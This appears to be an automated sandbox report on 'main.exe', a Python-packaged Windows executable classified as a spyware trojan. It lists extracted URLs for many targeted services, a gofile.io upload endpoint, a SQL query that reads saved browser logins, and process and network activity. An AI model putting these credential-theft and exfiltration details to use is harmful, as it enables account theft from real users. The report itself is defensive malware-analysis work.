00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024442172.000001E894863000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987244040.000001E893982000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972765253.000001E89459D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985312347.000001E89397C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993083249.000001E893984000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
            Source: main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974112566.000001E8945D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974081056.000001E8945C4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2011453288.000001E8945E2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972765253.000001E89459D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
            Source: main.exe, 00000002.00000003.1976302124.000001E894703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hbo.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hotmail.com)
            Source: main.exe, 00000002.00000003.1994855674.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997639786.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975055524.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003396948.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973010642.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2020672387.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980969299.000001E893C02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
            Source: main.exe, 00000002.00000003.1993083249.000001E893984000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975055524.000001E893BBE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2020621648.000001E893BD0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997639786.000001E893BD0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2013542756.000001E894850000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974563806.000001E893BAF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985699146.000001E89484B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979857009.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976823794.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024088246.000001E8947D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
            Source: main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.imgur.com/jJES3AX.png
            Source: main.exe, 00000002.00000002.2021248839.000001E893CF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://instagram.com)
            Source: main.exe, 00000002.00000003.2003018568.000001E8945A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
            Source: main.exe, 00000002.00000003.1973010642.000001E893A4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978592500.000001E893A5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
            Source: main.exe, 00000000.00000003.1749197199.0000024BCD655000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://markupsafe.palletsprojects.com/
            Source: main.exe, 00000000.00000003.1749197199.0000024BCD655000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://markupsafe.palletsprojects.com/changes/
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://minecraft.net)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://netflix.com)
            Source: main.exe, 00000002.00000003.1998028650.000001E894BC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975513124.000001E894BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://origin.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://outlook.com)
            Source: main.exe, 00000002.00000003.2001762476.000001E8945A1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972765253.000001E89459D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003018568.000001E8945A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/declaring-project-metadata/
            Source: main.exe, 00000002.00000002.2021777975.000001E894070000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022190852.000001E894370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
            Source: main.exe, 00000000.00000003.1749197199.0000024BCD655000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://palletsprojects.com/donate
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://paypal.com)
            Source: main.exe, 00000002.00000002.2017333313.000001E8933F0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1780566116.000001E89356F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1779749185.000001E89356F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://playstation.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pornhub.com)
            Source: main.exe, 00000002.00000002.2022190852.000001E894370000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
            Source: main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://riotgames.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://riotgames.com)i75802
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://roblox.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sellix.io)
            Source: main.exe, 00000002.00000003.1785741511.000001E8939DA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787126840.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981338350.000001E893A0D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787956610.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793152862.000001E893A07000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974979765.000001E8939E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984238904.000001E893A0D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978563125.000001E893A0C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012124595.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998205963.000001E893A0D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1785741511.000001E893A11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
            Source: main.exe, 00000002.00000002.2021777975.000001E894070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/userguide/declarative_config.html#opt-2
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://spotify.com)
            Source: main.exe, 00000002.00000003.2013074087.000001E89396A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793009900.000001E893AAF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977044312.000001E8935F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2013387739.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975698701.000001E8935C5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977713618.000001E893961000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1796280845.000001E893C26000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981338350.000001E893A01000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993956147.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974979765.000001E8939E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976909466.000001E8935C6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984238904.000001E893A04000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2020045883.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012429799.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1996321903.000001E893968000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001043628.000001E8935FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/questions/267399/how-do-you-match-only-valid-roman-numerals-with-a-regular
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stake.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steam.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://store1.gofile.io/contents/uploadfile
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://telegram.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com)
            Source: main.exe, 00000002.00000003.2001802176.000001E894710000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973551416.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976302124.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005186988.000001E894727000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2023563231.000001E89472A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
            Source: main.exe, 00000002.00000003.1997906839.000001E894A82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004907277.000001E8947DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006977893.000001E8947E4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024203636.000001E8947E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3610
            Source: main.exe, 00000002.00000003.1999083048.000001E894B30000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1996121577.000001E894BD2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1995247587.000001E894B2C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025577227.000001E894BD5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998028650.000001E894BD5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986551166.000001E894BCF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975513124.000001E894BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc5297
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitch.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com)
            Source: main.exe, 00000002.00000003.1977713618.000001E893961000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976200965.000001E894862000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998719177.000001E893984000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E894862000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001089205.000001E893984000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983459559.000001E894863000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2013542756.000001E894863000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979273332.000001E894862000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024442172.000001E894863000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987244040.000001E893982000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985312347.000001E89397C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993083249.000001E893984000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://uber.com)
            Source: main.exe, 00000002.00000002.2021248839.000001E893CF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://upload.pypi.org/legacy/
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
            Source: main.exe, 00000002.00000003.1981902344.000001E894A89000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1992755022.000001E894A89000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.archive.org/web/20120328125543/http://www.jpegcameras.com/libjpeg/libjpeg-3.html
            Source: main.exe, 00000002.00000003.1975924116.000001E893326000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2008458443.000001E89334A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012911590.000001E89334C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985986835.000001E89334A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977459782.000001E893349000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wiki.debian.org/XDGBaseDirectorySpecification#state
            Source: main.exe, 00000002.00000003.1976534572.000001E894A92000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012511330.000001E894A99000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025190061.000001E894A9C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
            Source: main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
            Source: main.exe, 00000002.00000003.1973010642.000001E893A4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978592500.000001E893A5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
            Source: main.exe, 00000002.00000003.1778406388.000001E893355000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778179908.000001E893355000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
            Source: main.exe, 00000002.00000003.1972023696.000001E89477F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001384242.000001E894787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
            Source: main.exe, 00000002.00000002.2024904909.000001E894A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984378367.000001E8949FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971942361.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984162933.000001E8949D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
            Source: main.exe, 00000002.00000003.1976823794.000001E8947EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E8947EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://xbox.com)
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com)
            Source: main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974112566.000001E8945D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974081056.000001E8945C4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2011453288.000001E8945E2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972765253.000001E89459D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://youtube.com)
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333B1B380_2_00007FF7333B1B38
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333B7BD40_2_00007FF7333B7BD4
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333980200_2_00007FF733398020
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333B6E700_2_00007FF7333B6E70
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333A24200_2_00007FF7333A2420
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333A44500_2_00007FF7333A4450
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333A6CF00_2_00007FF7333A6CF0
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333A3B880_2_00007FF7333A3B88
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333AEB240_2_00007FF7333AEB24
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333B531C0_2_00007FF7333B531C
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333A132C0_2_00007FF7333A132C
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF73339A26D0_2_00007FF73339A26D
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF733399A340_2_00007FF733399A34
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333B2AE40_2_00007FF7333B2AE4
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333A11280_2_00007FF7333A1128
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333BA9980_2_00007FF7333BA998
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333A90200_2_00007FF7333A9020
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333B70EC0_2_00007FF7333B70EC
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF73339989B0_2_00007FF73339989B
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333A3F8C0_2_00007FF7333A3F8C
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333A0F1C0_2_00007FF7333A0F1C
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333A173C0_2_00007FF7333A173C
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333A37500_2_00007FF7333A3750
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333A27B80_2_00007FF7333A27B8
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333AEFB80_2_00007FF7333AEFB8
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333B4E800_2_00007FF7333B4E80
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333B1B380_2_00007FF7333B1B38
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333B76880_2_00007FF7333B7688
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333AAE200_2_00007FF7333AAE20
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333AF6380_2_00007FF7333AF638
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333A96D00_2_00007FF7333A96D0
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333A0D180_2_00007FF7333A0D18
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333A15380_2_00007FF7333A1538
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF733398DC00_2_00007FF733398DC0
            Source: C:\Users\user\Desktop\main.exeCode function: String function: 00007FF733391E50 appears 53 times
            Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: _overlapped.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: python3.dll.0.drStatic PE information: No import functions for PE file found
            Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs main.exe
            Source: main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs main.exe
            Source: main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs main.exe
            Source: main.exe, 00000000.00000003.1752729643.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewin32ui.pyd0 vs main.exe
            Source: main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs main.exe
            Source: main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs main.exe
            Source: main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_elementtree.pyd. vs main.exe
            Source: main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs main.exe
            Source: main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs main.exe
            Source: main.exe, 00000000.00000003.1753127586.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs main.exe
            Source: main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs main.exe
            Source: main.exe, 00000000.00000003.1753253644.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140_1.dllT vs main.exe
            Source: main.exe, 00000002.00000002.2015409411.000001E891430000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs main.exe
            Source: classification engineClassification label: mal92.troj.spyw.winEXE@40/137@2/2
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802Jump to behavior
            Source: main.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\main.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT action_url, username_value, password_value FROM logins;
            Source: main.exeReversingLabs: Detection: 15%
            Source: main.exeVirustotal: Detection: 23%
            Source: C:\Users\user\Desktop\main.exeFile read: C:\Users\user\Desktop\main.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
